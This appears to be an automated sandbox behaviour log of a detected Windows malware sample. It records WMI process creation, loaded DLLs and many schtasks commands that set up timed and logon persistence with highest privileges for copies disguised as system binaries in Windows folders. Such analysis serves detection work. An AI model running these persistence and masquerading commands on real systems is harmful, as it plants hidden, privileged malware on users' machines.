                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: dmhu7oz5yP.exeReversingLabs: Detection: 78%
                            Source: dmhu7oz5yP.exeVirustotal: Detection: 80%
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile read: C:\Users\user\Desktop\dmhu7oz5yP.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\dmhu7oz5yP.exe "C:\Users\user\Desktop\dmhu7oz5yP.exe"
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f
                            Source: unknownProcess created: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
                            Source: unknownProcess created: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /f
                            Source: unknownProcess created: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f
                            Source: unknownProcess created: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f
                            Source: unknownProcess created: C:\Users\Public\Libraries\RuntimeBroker.exe C:\Users\Public\Libraries\RuntimeBroker.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                            Source: unknownProcess created: C:\Users\Public\Libraries\RuntimeBroker.exe C:\Users\Public\Libraries\RuntimeBroker.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\Media\WinStore.App.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 10 /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: unknownProcess created: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: userenv.dllJump to behavior
